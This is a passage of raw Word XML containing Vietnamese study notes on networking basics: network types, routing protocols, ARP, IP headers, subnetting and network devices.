        <w:t>PAN là mạng máy tính thường bao gồm máy tính, thiết bị di động hoặc trợ lý kỹ thuật số cá nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B691412" w14:textId="4D469BD6" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LAN (Mạng cục bộ) là một nhóm máy tính và thiết bị ngoại vi được kết nối trong một khu vực giới hạn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC4A43" w14:textId="169CDEA8" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAN (Mạng diện rộng) là một mạng máy tính quan trọng khác được trải rộng trên một khu vực địa lý rộng lớn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CA683" w14:textId="4E1E2DC3" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng khu vực đô thị hoặc MAN bao gồm một mạng máy tính trên toàn bộ thành phố, khuôn viên trường đại học hoặc một khu vực nhỏ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDF27D" w14:textId="1DC609A7" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WLAN là mạng cục bộ không dây giúp bạn liên kết một hoặc nhiều thiết bị bằng cách sử dụng. Nó sử dụng giao tiếp không dây trong một khu vực hạn chế như nhà, trường học hoặc tòa nhà văn phòng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE0E59" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SAN là mạng khu vực lưu trữ là một loại mạng cho phép lưu trữ dữ liệu cấp khối, hợp nhất </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395AAA6B" w14:textId="5FE752F1" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng khu vực hệ thống cung cấp kết nối tốc độ cao trong các ứng dụng từ máy chủ đến máy chủ, mạng khu vực lưu trữ và các ứng dụng từ bộ xử lý đến bộ xử lý</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664892A6" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POLAN là một công nghệ mạng giúp bạn tích hợp vào hệ thống cáp có cấu trúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F88E1F" w14:textId="067BDFAE" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng gia đình (HAN) luôn được xây dựng bằng cách sử dụng hai hoặc nhiều máy tính được kết nối với nhau để tạo thành mạng cục bộ (LAN) trong nhà</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D415C" w14:textId="2589167B" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng doanh nghiệp mạng tư nhân (EPN) được xây dựng và sở hữu bởi các doanh nghiệp muốn kết nối an toàn các địa điểm khác nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC418CB" w14:textId="315EFC3E" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mạng khu vực trường (CAN) được tạo thành từ sự kết nối với nhau của các mạng LAN trong một khu vực địa lý cụ thể</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85959B" w14:textId="207A2FDA" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VPN là mạng riêng tư sử dụng mạng công cộng để kết nối các trang web hoặc người dùng từ xa với nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9531F" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LAN là viết tắt của gì? LAN là viết tắt của Local Area Network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6000DEFB" w14:textId="70157A31" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sự khác biệt giữa LAN và WAN là gì? Mạng LAN là mạng máy tính bao phủ một khu vực địa lý nhỏ, như nhà riêng, văn phòng hoặc nhóm tòa nhà, trong khi WAN là mạng máy tính bao phủ một khu vực rộng hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494BB7C" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục đích của Giao thức Định tuyến là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E9326D" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giao thức định tuyến được yêu cầu vì những lý do sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05406A26" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cho phép lựa chọn đường dẫn tối ưu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334F286" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cung cấp định tuyến không lặp lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148B36D" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hội tụ nhanh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D185802" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giảm thiểu lưu lượng cập nhật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F4FE7E" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dễ dàng cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D429B3" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thích ứng với những thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545090AB" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cân ở kích thước lớn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAC564" w14:textId="77777777" w:rsidR="00E74932" w:rsidRPr="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tương thích với các máy chủ và bộ định tuyến hiện có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDA0B7" w14:textId="7B2F26E1" w:rsidR="00E74932" w:rsidRDefault="00E74932" w:rsidP="00E74932">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E74932">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hỗ trợ độ dài thay đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF36D83" w14:textId="309C9CDC" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------------(summary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A772C" w14:textId="4FF47F69" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Advanced Stuff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8BD54" w14:textId="3203CB2F" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>TCP 3-Way handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56969B5F" w14:textId="3E77388B" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>VLAN?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC1000A" w14:textId="185C69CE" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53BE95" w14:textId="06D97216" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A8ED0DA" wp14:editId="63EF243E">
            <wp:extent cx="5630061" cy="258163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2581635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA5802" w14:textId="1D043CF3" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>IP Packet Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A3052D" w14:textId="6886E53F" w:rsidR="00630F20" w:rsidRPr="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:r>
        <w:t>IP Header là thông tin meta ở đầu gói IP. Nó hiển thị thông tin như phiên bản IP, độ dài của gói, nguồn và đích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2DB9A" w14:textId="77777777" w:rsidR="00630F20" w:rsidRPr="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCF5D25" w14:textId="77777777" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Routing Protocols </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B740DBD" w14:textId="1E3B0B41" w:rsidR="00630F20" w:rsidRPr="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là tập hợp các quy tắc xác định được sử dụng bởi các bộ định</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tuyến để giao tiếp giữa nguồn và đích. Họ không di chuyển thông tin từ nguồn đến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đích mà chỉ cập nhật bảng định tuyến có chứa thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6B864" w14:textId="66E59952" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các giao thức của Bộ định tuyến mạng giúp xác định cách các bộ định tuyến giao</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tiếp với nhau. Nó cho phép mạng chọn các route giữa hai nodes bất kỳ trên mạng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy tính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE19147" w14:textId="77777777" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Static Routing Protocols </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137CC6A" w14:textId="58DD4696" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:r>
        <w:t xml:space="preserve">được sử dụng khi quản trị viên chỉ định thủ công đường dẫn từ nguồn đến mạng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> đ</w:t>
      </w:r>
      <w:r>
        <w:t>ích. Nó cung cấp bảo mật hơn cho mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF964C" w14:textId="77777777" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Dynamic Routing Protocols </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9B837" w14:textId="77777777" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:r>
        <w:t>là một loại giao thức định tuyến quan trọng khác. Nó giúp các bộ định tuyến tự động thêm thông tin vào bảng định tuyến của chúng từ các bộ định tuyến được kết nối. Các loại giao thức này cũng gửi các bản cập nhật cấu trúc liên kết bất cứ khi nào mạng thay đổi cấu trúc cấu trúc liên kết.</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E217E0" w14:textId="1AF3FFD1" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Address Resolution Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B44C17" w14:textId="48679524" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:r>
        <w:t>ARP (viết tắt của cụm từ Address Resolution Protocol) là giao thức mạng được</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dùng để tìm ra địa chỉ phần cứng (địa chỉ MAC) của thiết bị từ một địa chỉ IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nguồn. Nó được sử dụng khi một thiết bị giao tiếp với các thiết bị khác dựa trên</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nền tảng local network. Ví dụ như trên mạng Ethernet mà hệ thống yêu cầu địa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>chỉ vật lý trước khi thực hiện gửi packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE9DFA1" w14:textId="033555CD" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:r>
        <w:t>ARP cho phép một mạng quản lý các kết nối độc lập với những thiết bị vật lý cụ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>thể được gắn vào từng mạng. Điều này cho phép giao thức Internet vận hành</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hiệu quả hơn so với việc nó phải tự quản lý địa chỉ của các thiết bị phần cứng và</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mạng vật lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EBC15" w14:textId="76CA4895" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC &amp; IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F6D58" w14:textId="032C22C9" w:rsidR="00630F20" w:rsidRDefault="00630F20" w:rsidP="00630F20">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F20">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3F3D21" wp14:editId="4818F91A">
            <wp:extent cx="5868219"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219" cy="5163271"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62F25B" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00630F20">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B841A8">
        <w:t xml:space="preserve">IP Routing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC3AD9" w14:textId="2BF2CF85" w:rsidR="00630F20" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r w:rsidRPr="00B841A8">
        <w:t>là một quá trình gửi các gói từ một máy chủ trên một mạng đến một máy chủ khác trên một mạng từ xa khác. Nó giúp bạn kiểm tra địa chỉ IP đích của một gói tin, xác định địa chỉ bước tiếp theo và chuyển tiếp nó. Các bộ định tuyến IP sử dụng các bảng định tuyến để xác định địa chỉ bước tiếp theo mà gói tin sẽ được chuyển đến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47225F00" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Subnetting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FDFCF" w14:textId="401BCCD7" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>là chia một mạng thành hai hoặc các mạng nhỏ hơn. Nó làm tăng hiệu quả định tuyến, giúp tăng cường bảo mật của mạng và giảm kích thước của miền quảng bá.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E2F26" w14:textId="33768697" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:t>IP Subnetting chỉ định các bit bậc cao từ máy chủ lưu trữ như một phần của tiền tố mạng. Phương pháp này chia một mạng thành các mạng con nhỏ hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651612D0" w14:textId="1ADCAC1A" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8"/>
    <w:p w14:paraId="63850A27" w14:textId="77777777" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modem Modem (viết tắt của Modulator and Demodulator – Bộ điều giải) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC3228F" w14:textId="01E36180" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>là một thiết bị điều chế sóng tín hiệu tương tự để mã hóa dữ liệu số, và giải điều chế tín hiệu mạng để giải mã tín hiệu số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCCB400" w14:textId="7A8E48B5" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B200B20" w14:textId="6976FCBF" w:rsidR="00B841A8" w:rsidRDefault="00B841A8" w:rsidP="00B841A8">
      <w:r>
